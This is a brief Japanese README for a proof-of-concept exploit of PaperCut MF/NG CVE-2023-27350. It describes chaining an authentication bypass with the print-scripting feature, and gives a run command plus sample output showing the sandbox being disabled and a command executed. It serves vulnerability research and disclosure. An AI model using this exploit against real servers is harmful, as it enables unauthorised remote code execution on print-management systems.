
PaperCut CVE-2023-27350 の概念実証エクスプロイト
PaperCut MF/NGに影響するCVE-2023-27350のPoC
脆弱性の根本原因分析、侵害指標、インターネット露出については、当社のブログをご覧ください: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
このPoCは、認証バイパスの脆弱性と組み込みスクリプト機能の悪用を連鎖させてコードを実行します。
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
最新バージョンに更新するか、PaperCutセキュリティアドバイザリ内の指示に従って緩和してください。
このソフトウェアは、純粋に学術研究と効果的な防御技術の開発を目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトメンテナは、ソフトウェアの誤用について責任を負いません。責任を持って使用してください。